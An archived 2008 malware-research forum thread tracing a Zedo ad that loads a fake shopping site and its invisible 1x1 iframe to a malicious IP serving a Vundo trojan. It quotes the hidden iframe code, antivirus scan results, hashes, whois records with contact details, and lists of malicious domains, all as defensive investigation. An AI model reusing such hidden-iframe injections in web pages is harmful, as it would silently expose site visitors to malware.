Help - Search - Members - Calendar
Full Version: 85.12.43.126 spreading malware via Zedo
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
wagdoll
Dec 6 2008, 04:13 AM
zedo leaderboard:

CODE
<iframe height="90" frameborder="0" width="728" scrolling="no" allowtransparency="true" marginwidth="0" marginheight="0" src="http://d3.zedo.com/jsc/d3/ff2.html?n=790;c=338/1;s=296;d=14;w=728;h=90">


(example publisher website: valeptr.com/pages/ptp.php)

As often happens with Zedo, this ad being served is not a graphic banner but a full webpage.

Skipping codes, it's loading this site in that iframe:

CODE
<iframe height="100%" frameborder="0" width="100%" scrolling="yes" src="http://ashoping.com/?sid=aff0035">


That site is hotlinking images from another site, so this seems to be a copy/fake job (images are hotlinked from a site called Netpaidshopping.com, I believe this is the genuine site.)

Below the </html> on ashoping.com there is an invisible iframe:

CODE
<iframe height="1" width="1" src="http://85.12.43.126/css/index.php?sid=6a5b6a5362576f5d6f5e630a7a157d0e6f52665e6a52645559" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;">


That IP address is also the server that ashoping.com is located on according to whois details

QUOTE
IP Address: 85.12.43.124 Whois | Reverse-IP | Ping | DNS Lookup | Traceroute
IP Location Netherlands - Netherlands - Xentronix

Domain servers in listed order:

NS1.ASHOPING.COM 193.33.61.161
NS2.ASHOPING.COM 85.12.43.119

Created: 2008-10-13


The page in the iframe is giving SID timeout response, but searching google it appears that the IP has a history of malware [url=http://www.bitdefender.com/VIRUS-1000421-en--Trojan.JS.Injector.E.htmlTrojan.JS.Injector[/url]
Kimberly
Dec 6 2008, 03:25 PM
Thanks wagdoll, I'll have a peek at this one.

QUOTE
The page in the iframe is giving SID timeout response,
That's normal, the SID is a session cookie usually based on date/time etc ... it's only valid for a short time and you need the cookie that goes with it.

Kimberly
Dec 6 2008, 04:36 PM
85.12.43.126 has an obfuscated script that leads to 64.22.81.244 which hosts an excutable. I got hit on clicksor / popunder.adtrgt.com by the same stuff (bigmp3online) and buynow21.com - 85.17.166.137 is also serving the same iframe to 85.12.43.126

File winu8FxBK3R9CXHd.exe received on 12.06.2008 17:04:18 (CET)
AhnLab-V3 2008.12.6.0 2008.12.06 -
AntiVir 7.9.0.42 2008.12.05 -
Authentium 5.1.0.4 2008.12.06 -
Avast 4.8.1281.0 2008.12.06 -
AVG 8.0.0.199 2008.12.05 -
BitDefender 7.2 2008.12.06 -
CAT-QuickHeal 10.00 2008.12.06 (Suspicious) - DNAScan
ClamAV 0.94.1 2008.12.06 -
Comodo 698 2008.12.06 -
DrWeb 4.44.0.09170 2008.12.06 -
eSafe 7.0.17.0 2008.12.04 Suspicious File
eTrust-Vet 31.6.6245 2008.12.05 -
Ewido 4.0 2008.12.06 -
F-Prot 4.4.4.56 2008.12.04 -
F-Secure 8.0.14332.0 2008.12.06 -
Fortinet 3.117.0.0 2008.12.06 -
GData 19 2008.12.06 -
Ikarus T3.1.1.45.0 2008.12.06 Trojan.Win32.Vundo
K7AntiVirus 7.10.547 2008.12.06 -
Kaspersky 7.0.0.125 2008.12.06 -
McAfee 5455 2008.12.05 -
McAfee+Artemis 5455 2008.12.05 -
Microsoft 1.4205 2008.12.06 Trojan:Win32/Vundo.gen!AK
NOD32 3668 2008.12.06 -
Norman 5.80.02 2008.12.05 -
Panda 9.0.0.4 2008.12.06 -
PCTools 4.4.2.0 2008.12.06 -
Prevx1 V2 2008.12.06 Malicious Software
Rising 21.06.52.00 2008.12.06 -
SecureWeb-Gateway 6.7.6 2008.12.06 -
Sophos 4.36.0 2008.12.06 -
Sunbelt 3.1.1832.2 2008.12.01 -
Symantec 10 2008.12.06 -
TheHacker 6.3.1.2.178 2008.12.06 -
TrendMicro 8.700.0.1004 2008.12.05 -
VBA32 3.12.8.10 2008.12.05 -
ViRobot 2008.12.6.1504 2008.12.06 -
VirusBuster 4.5.11.0 2008.12.05 -

Additional information
File size: 62464 bytes
MD5...: a18715f6da0d931977f4046d9221e87b
SHA1..: 145b69620e6a290d78c8f739d76388697d5f9b54
SHA256: b459962b854fffc8a9859eb6a5168863a2371a522a55da45d4d1f3549516df0b


ashoping.com a 85.12.43.124
ns1.ashoping.com 193.33.61.161
ns2.ashoping.com 85.12.43.119
ns3.ashoping.com ?
ns4.ashoping.com ?

hostnames sharing ip with a-records
ns4.financestoc.com

domains using this as nameserver
financestoc.com

domains sharing nameservers
automobilewdew.com
bigmp3online.com <-- through Clicksor advertising (Vundo)
bretick.com
detoxitnow.com
financestoc.com
greatlakemusic.com
mp3cdt.com
travelcardclub.com
zekib.com

subdomains
*.ashoping.com
ns1.ashoping.com
ns2.ashoping.com

mail10.ehlodelivery.net. - 64.22.81.244

Domain Name: EHLODELIVERY.NET
Registrar: NAME.COM LLC
Whois Server: whois.name.com
Name Server: NS1.EHLODELIVERY.NET
Name Server: NS2.EHLODELIVERY.NET
Status: clientTransferProhibited
Updated Date: 28-sep-2008
Creation Date: 15-sep-2008
Expiration Date: 15-sep-2009
REGISTRANT CONTACT INFO
Inet Advertising
Domain Administrator
234 Morrell Rd.
Suite 160
Knoxville
TN
37919
US
Phone: +1.6155126750
Email Address: inetadvertising.admin@gmail.com
Kimberly
Dec 6 2008, 06:13 PM
Some reports showing that most of the domains above are involved with malware distribution.

automobilewdew.com
https://safeweb.norton.com/report/show?name...omobilewdew.com

bigmp3online.com
https://safeweb.norton.com/report/show?name=bigmp3online.com

detoxitnow.com
https://safeweb.norton.com/report/show?name=detoxitnow.com

financestoc.com
https://safeweb.norton.com/report/show?name=financestoc.com

greatlakemusic.com
IPB Image

mp3cdt.com
https://safeweb.norton.com/report/show?name=mp3cdt.com

zekib.com
QUOTE
The following Internet Connection was established
zekib.com 80 (null) (null)
http://www.threatexpert.com/report.aspx?uid=6810dad6-ee34-4786-bc01-5ed8272f9077
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.